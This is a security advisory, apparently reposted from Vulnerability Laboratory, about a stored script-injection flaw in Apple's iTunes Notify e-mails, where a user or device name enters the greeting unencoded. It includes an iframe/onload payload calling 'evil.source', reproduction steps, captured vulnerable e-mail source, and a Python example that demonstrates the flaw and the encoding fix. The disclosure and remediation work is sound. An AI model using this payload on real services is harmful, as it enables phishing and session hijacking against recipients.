
Apple iTunes Notify Script Insertion

Posted Jan 16, 2017
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

Apple iTunes suffers from a malicious script insertion vulnerability.

tags | exploit
systems | apple
SHA-256 | fb247880f08a8bd28b94a85e88833c57c264ecaa21d838a3d97019731f90b7fe

Document Title:
===============
Apple (iTunes Notify) - Bypass & Persistent Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2024

Followup ID: 654962036

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2016/12/22/apple-ios-102-notify-function-vulnerable-attacks-idevice-itunes-appstore


Release Date:
=============
2017-01-16


Vulnerability Laboratory ID (VL-ID):
====================================
2024


Common Vulnerability Scoring System:
====================================
3.8


Product & Service Introduction:
===============================
iOS is a mobile operating system created and developed by Apple Inc. exclusively for its hardware. It is the operating
system that presently powers many of the company's mobile devices, including the iPhone, iPad, and iPod touch.

(Copy of the Homepage: https://en.wikipedia.org/wiki/IOS )

iTunes is a media player, media library, online radio broadcaster, and mobile device management application developed by Apple Inc.
It is used to play, download, and organize digital downloads of music and video (as well as other types of media available on the iTunes Store)
on personal computers running the macOS and Microsoft Windows operating systems. The iTunes Store is also available on the iPhone, iPad, and iPod Touch.
Through the iTunes Store, users can purchase and download music, music videos, television shows, audiobooks, podcasts, movies, and movie rentals in some
countries, and ringtones, available on the iPhone and iPod Touch (fourth generation onward). Application software for the iPhone, iPad and iPod Touch can
be downloaded from the App Store. iTunes 12.5 is the most recent major version of iTunes, available for Mac OS X v10.9.5 or later and Windows 7 or later;
it was released on September 13, 2016. iTunes 12.2 added Apple Music to the application, along with the Beats 1 radio station, and iTunes 12.5 offers a
refinement of the Apple Music interface.

(Copy of the Homepage: https://en.wikipedia.org/wiki/ITunes )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a persistent input validation vulnerability and mail encoding issue in the official Apple iTunes online service web application.


Vulnerability Disclosure Timeline:
==================================
2016-12-15: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-12-16: Vendor Notification (Apple Product Security Team)
2016-12-16: Vendor Response/Feedback (Apple Product Security Team)
2017-**-**: Vendor Fix/Patch (Apple Cupertino Service Developer Team)
2017-**-**: Security Acknowledgements (Apple Product Security Team)
2017-01-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Apple
Product: iTunes & AppStore - Online Service (Web-Application) 2016 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation vulnerability and mail encoding issue has been discovered in the official Apple iTunes online service web application.
The vulnerability allows remote attackers to inject their own script code on the application side of the vulnerable module or function; the payload
is stored and rendered later, which makes the attack vector persistent.

The vulnerability is located in the new iTunes and App Store `Notify` function for iOS 10 devices. The function takes the user's iCloud account name
or the device name to address the notification. The outgoing e-mail generated by the new.itunes.com service does not encode or filter these
user-controlled values before placing them in the message, so a remote attacker can inject a payload that renders in the greeting line ("Hello <name>,")
of the notify e-mail body. The values are taken from the device during sync, and the attack vector is persistent. The injection point is the `firstname`
value of the user account (or the device name), and the execution point is the outgoing e-mail sent from the "@new.itunes.com" sender. The same type of
vulnerability was disclosed by our team in the App Store and iTunes invoices in 2015 (Ref: https://www.vulnerability-lab.com/get_content.php?id=1512 ).
The vulnerability can be exploited from iOS devices with restricted access to reach the inbox of the main account holder.
The issue could also be used to continue the calendar spam activities.

The security risk of the persistent input validation and mail encoding web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring
System) score of 3.8. Exploitation of the vulnerability requires a low-privilege Apple (App Store/iTunes) account and low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external sources and
persistent manipulation of affected or connected service module context.

Vulnerable Module(s):
[+] Notify (New Function)

Vulnerable Parameter(s):
[+] firstname & name

Affected Module(s):
[+] Outgoing Service Notify Email Body

Affected Sender(s):
[+] do_not_reply@new.itunes.com


Proof of Concept (PoC):
=======================
The persistent input validation and mail encoding vulnerability can be exploited by remote attackers with a low-privilege user account and low user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps provided below.


PoC: Payload(s)
>"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")>


Manual steps to reproduce the vulnerability ... (via iCloud, on old entries)
1. First you need an existing account with a script code payload stored in the firstname and lastname values
2. Log in with that account on the iOS device
3. Then open the iTunes app or the App Store app
4. Search for Super Mario Run and locate the new notification button
5. Activate the notification button
Note: Now wait until the app becomes available, because at that point you will receive a notify e-mail containing the name values
6. The e-mail arrives in the inbox with the manipulated firstname and lastname values after the introductory word "Hello" in the e-mail body

Manual steps to reproduce the vulnerability ... (without iCloud, on new entries)
1. Change the device name to a script code payload (e.g. on an ipad2)
2. Then move to the App Store or iTunes app
3. Search for Super Mario Run and tap the button to request the notification
4. The moment the release becomes available, an e-mail arrives containing the values taken from the device or account
5. The e-mail arrives in the inbox with the manipulated firstname and lastname values after the introductory word "Hello" in the e-mail body

Note: The issue is similar to the iTunes invoice vulnerability already discovered and exploited in 2015. The new.itunes.com service does
not have the secure validation because it was implemented only recently. Because the user account values are taken at the moment the
notify button is activated, the issue can be exploited. We prepared the exploitation already in September and got the confirmation with the
Super Mario Run release in the EU around the 15th.


PoC: Vulnerable Source (Email - )
<!-- end table containing Apple logo -->
<!-- begin table containing body copy -->
<table style="margin:0 auto" class="appl_100" width="600" cellspacing="0" cellpadding="0" border="0">
<tbody><tr><td class="appl_stack" valign="top" align="left">
<!-- begin table containing individual app -->
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr><td class="appl_app_txt" style="padding-bottom:14px;" align="left">
<div style="font-family:Helvetica Neue, Helvetica,Lucida Grande,Lucida Sans,Lucida Sans Unicode,Arial,sans-serif;color:#444444;font-size:14px;line-height:1.32em;">
Hallo >"<iframe src="evil.source" onload="alert("ITUNESHACKWITHMARIO")">,
</div></td></tr>
<tr><td align="left" class="appl_app_txt" style="padding-bottom:14px;">
<div style="font-family:Helvetica Neue, Helvetica,Lucida Grande,Lucida Sans,Lucida Sans Unicode,Arial,sans-serif;color:#444444;font-size:14px;line-height:1.32em;">
du wolltest benachrichtigt werden, wenn es soweit ist &ndash; &bdquo;Super Mario Run&ldquo; von Nintendo ist jetzt erh&auml;ltlich. Du kannst das Spiel im App Store
auf deinem iPhone oder iPad laden.&nbsp;
<br/><br/><a href="http://new.itunes.com/r?v=2&la=de&lc=de&a=FOqorWUXVdIQSl%2BmwRhvEMkn5ABvajpZZ04kDWpusUAHBdiykmA79VRZJzTLitI%2F&ct=aI6r3a7q6p"
style="color:#0088cc" class="appl-link">Jetzt laden</a>
<BR><BR>
Beste Gr&uuml;&szlig;e<br/>
Das App Store-Team


Vulnerable Email (Header)
Return-Path: <donotrep_nt_bounces@new.itunes.com>
------=_Part_10460774_1004383268.1481850993725
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hallo >"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")>,
du wolltest benachrichtigt werden, wenn es soweit ist =E2=80=93 =E2=80=9ESu=
per Mario Run=E2=80=9C von Nintendo ist jetzt erh=C3=A4ltlich. Du kannst da=
s Spiel im App Store auf deinem iPhone oder iPad laden.=C2=A0

Jetzt laden
http://new.itunes.com/r?v=3D2&la=3Dde&lc=3Dde&a=3DFOqorWUXVdIQSl%2BmwRhvEMk=
n5ABvajpZZ04kDWpusUAHBdiykmA79VRZJzTLitI%2F&ct=3DaI6y6a2j9C

Beste Gr=C3=BC=C3=9Fe
Das App Store-Team


Reference(s):
https://itunes.apple.com/us/app/super-mario-run/id1145275343


Solution - Fix & Patch:
=======================
The vulnerability can be patched by the following solution steps ...
1. Disallow the use of special characters in the name values (firstname, lastname) to remove the injection point.
2. Encode the outgoing name values in the @new.itunes.com sender before they are inserted into the e-mail body to remove the execution point.
3. Use only the iCloud credentials, where a secure input protection has been implemented in the meantime.
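The following is an added example written for this page; it is not code from Vulnerability Laboratory or from Apple's new.itunes.com service. It reproduces the flaw described in the Technical Details section (a stored name pasted unencoded into the greeting line of a quoted-printable notify e-mail) and then applies solution steps 1 and 2 above: an input allow-list for the name and HTML encoding at the point the name enters the template. The validate/build/audit functions, the name rule, the recipient address and the sample payload are assumptions for illustration; the German body text is taken from the captured e-mail in the PoC section.

```python
"""Added example (not code from Vulnerability Lab or Apple): reproduces the
flaw described in Technical Details, where a stored user name is pasted
unencoded into the greeting line of the notify e-mail, and applies the two
fixes from the Solution section (validate on input, encode on output).
The render/validate/audit functions, the name rule, the recipient and the
sample payload are assumptions made for illustration; the body text comes
from the captured e-mail in the advisory."""
import html
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Constructed payload in the same shape as the advisory's PoC string.
PAYLOAD = '>"<iframe src="evil.source" onload=alert("ITUNESHACKWITHMARIO")>'

# Body templates; only the {name} slot is user-controlled.
TEXT_BODY = (
    "Hallo {name},\n"
    "du wolltest benachrichtigt werden, wenn es soweit ist \u2013 "
    "\u201eSuper Mario Run\u201c von Nintendo ist jetzt erh\u00e4ltlich.\n"
)
HTML_BODY = (
    '<div style="font-size:14px">Hallo {name},</div>\n'
    "<div>du wolltest benachrichtigt werden, wenn es soweit ist &ndash; "
    "&bdquo;Super Mario Run&ldquo; von Nintendo ist jetzt erh&auml;ltlich.</div>\n"
)

# Fix step 1 (input side): a hypothetical allow-list for display names.
# Letters, digits, space, dot, apostrophe and hyphen; no markup characters.
NAME_RE = re.compile(r"[\w .'\-]{1,64}")


def validate_name(name: str) -> bool:
    """Reject names that carry markup before they are stored on the account."""
    return NAME_RE.fullmatch(name) is not None


def build_notify_mail(name: str, escape: bool) -> bytes:
    """Build the multipart/alternative notify message.

    escape=False reproduces the flaw: the stored name goes into the HTML
    part verbatim.  escape=True applies fix step 2, HTML-encoding the name
    at the point it is inserted into the template.
    """
    html_name = html.escape(name, quote=True) if escape else name
    msg = EmailMessage(policy=policy.SMTP)
    msg["From"] = "do_not_reply@new.itunes.com"
    msg["To"] = "user@example.com"  # assumed recipient
    msg["Subject"] = "Super Mario Run ist jetzt erh\u00e4ltlich"
    # quoted-printable, as in the captured Content-Transfer-Encoding header;
    # the transfer encoding does not neutralise the markup, it only wraps it.
    msg.set_content(TEXT_BODY.format(name=name), charset="utf-8",
                    cte="quoted-printable")
    msg.add_alternative(HTML_BODY.format(name=html_name), subtype="html",
                        charset="utf-8", cte="quoted-printable")
    return msg.as_bytes()


def html_greeting(raw: bytes) -> str:
    """Decode the text/html part (undoing quoted-printable) and return the
    text between 'Hallo ' and the comma that closes the greeting."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    part = msg.get_body(preferencelist=("html",))
    if part is None:
        return ""
    m = re.search(r"Hallo (.*?),", part.get_content(), re.DOTALL)
    return m.group(1) if m else ""


def greeting_has_markup(raw: bytes) -> bool:
    """Detection check: does the rendered greeting contain a raw tag?"""
    return "<" in html_greeting(raw)


if __name__ == "__main__":
    print("payload accepted by input filter:", validate_name(PAYLOAD))
    for escape in (False, True):
        raw = build_notify_mail(PAYLOAD, escape=escape)
        print(f"escape={escape}: markup in greeting ->",
              greeting_has_markup(raw))
```

Two points worth noting when applying the fix. Step 1 alone is not sufficient, because the device name is a second source for the same template slot; the output encoding in step 2 is the control that closes the execution point regardless of where the value came from. And whether the `onload` handler actually fires depends on the receiving mail client, which usually strips scripts and often blocks iframes; the injected markup, links and text still survive, which is what makes the phishing and redirect outcomes listed in the advisory practical.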


Security Risk:
==============
The security risk of the persistent input validation web vulnerability and mail encoding issue in the iTunes notify function is estimated as medium. (CVSS 3.8)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.

Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
